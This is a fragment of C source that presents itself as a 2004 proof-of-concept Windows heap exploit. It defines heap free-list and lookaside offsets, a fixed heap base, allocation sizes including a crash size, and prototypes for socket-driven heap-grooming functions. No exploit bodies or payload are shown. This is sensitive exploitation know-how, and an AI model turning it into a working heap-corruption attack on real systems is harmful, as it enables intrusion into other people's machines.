// Proof-of-concept code heap exploit code
// Written by Matt Conover in December 2004
#include <windows.h>
#include "sock.h"

// These are the same for all applications:
#define CACHE_OFFSET 0x170
#define LOOKASIDE_FILL_SIZE 4
#define FREELIST_OFFSET 0x178
#define FREELIST_SIZE 8
#define FIRST_FREE_LIST (HEAP_BASE + FREELIST_OFFSET)
#define LOOKASIDE_OFFSET 0x688
#define LOOKASIDE_SIZE 48
#define FIRST_LOOKASIDE_LIST (HEAP_BASE + LOOKASIDE_OFFSET)

// Application specific
#define HEAP_BASE 0x350000
#define ALLOC_SIZE 64
#define ALLOC_SIZE2 72
#define CHUNK_SIZE2 ((ALLOC_SIZE2/8)+1)
#define CRASH_ALLOC_SIZE 104

void DumpBuffer(char *varname, char *buf, int len);
BOOL EmptyLookasideList(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
BOOL FillLookasideList(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
int AllocChunk(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
BOOL FreeChunk(SOCK *sock);
BOOL FreeAnyChunk(SOCK socks[], int AllocSize);